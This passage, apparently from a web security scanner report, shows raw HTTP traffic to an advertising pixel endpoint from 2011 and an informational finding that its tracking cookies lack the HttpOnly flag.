!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; lifb=o1s9XqSS1F_lTr7; ih="b!!!!]!'4@g!!!!#=$KA3!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!-5BI!!!!$=$J^*!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!.g(t!!!!#=)!a#!.g.)!!!!%=)!^q!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W4@!!!!#=(1IO!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1qGe!!!!#=%1p'!1wmg!!!!#=)![j!2*,b!!!!#=(h4W!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2`+,!!!!#='hw!!2gH2!!!!#='i#o!2l>@!!!!#=(aKS!3$a2!!!!#=)5nT"; vuday1=.YdUZNGAXvW^rAL; pv1="b!!!!/!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!$'!_!$5*F!%1#4!1W4@!%uAQ!!!!$!?5%!*)IX>!?Q8(!(1br~~~~~~~=(1IO=*.n+!!!([!!3^d!!E)$!$XwX!/+NP!#bCp!'9kN!?5%!(glx6!w1K*!%4=%!$u!@!$F%,~~~~~=(aOb=/%Zq~!#0:.!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!$$eQ!!#6W!$a+)!2*,b!%vIB!!!!$!?5%!$Tey-![:Z-!':kx!(36D~~~~~~=(h4W~~!#aQ9!!E)(!$XwW!1wmg!%+@A!!!%%!?5%!)e#I<!w1K*!%4=*!#(jY!'+(>~~~~~=)![p=-6G!~!#3yC#[gVp!$glF!1`)_!%bq`!!!!$!?5%!)e#I<!w1K*!',LB!$iom!'pCX~~~~~=)![y=-6G,~!$3Gv!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3Gx!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H!!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~!$3H$!,swX!#7V=!3$a2!%yFx!!!!$!?5%!$qF>1!wVd.!$:F,!#gj!!(6r7~~~~~=)5nT=-IX_~"; BX=edn6q5d6t078b&b=4&s=k0&t=135; liday1=NMJ:9NGAXv_DzI$

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%3!!!?J!!!!)='htq!!(1-!!!!/=)5n]!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!/=)5n]!!/GR!!!!/=)5n]!!/Ju!!!!$='htq!!/K$!!!!*=)5n]!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!*=)5n]!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!0=)5n]!!J<K!!!!0=)5n]!!J<O!!!!.=)5n]!!J<S!!!!0=)5n]!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=)5n]!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=)5n]!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=)5n]!#MTF!!!!'=%=]S!#MTH!!!!0=)5n]!#MTI!!!!0=)5n]!#MTJ!!!!0=)5n]!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=)5n]!#UDQ!!!!0=)5n]!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=)5n]!#]Uq!!!!'=)5n]!#]Uy!!!!'=)5n]!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!%=)5n]!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=)5n]!#`-[!!!!)=)5n]!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=)5n]!#b86!!!!%=)5n]!#b87!!!!%=)5n]!#b8:!!!!%=)5n]!#b8F!!!!%=)5n]!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=)5n]!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!%=)5n]!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=)5n]!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!(=)5n]!#tM*!!!!$=$Ju9!#uQC!!!!-=)5n]!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!'=)5n]!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=)5n]!$#X4!!!!#=#%VO!$#yu!!!!.=)5n]!$$I]!!!!%=)5n]!$$Ig!!!!%=)5n]!$$Il!!!!%=)5n]!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!*=)5n]!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f6!!!!$=)5n]!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+2v!!!!$=)5n]!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; path=/; expires=Sat, 22-Jun-2013 13:44:46 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 23 Jun 2011 13:44:46 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 1
Proxy-Connection: close

GIF89a.............!.......,...........D..;

8.8. http://ad.yieldmanager.com/unpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%:!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#7jn~~!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8T@~~!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65~~!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#bj8~~!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b~~!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S~~!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+2C~~!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$,r9~~!$-'0!!!!#='i$,!$-pv~~!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/Ck~~!$/Cl~~!$/Cy~~!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; path=/; expires=Sat, 22-Jun-2013 13:44:54 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?t=2&id=1060736&id=1306956&id=764563&id=1258217&id=1317655&id=1287356&id=1317669&id=1056483&id=1200176&id=769958&id=1299842&id=1317656 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; bh="b!!!%1!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!,=(6NF!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xt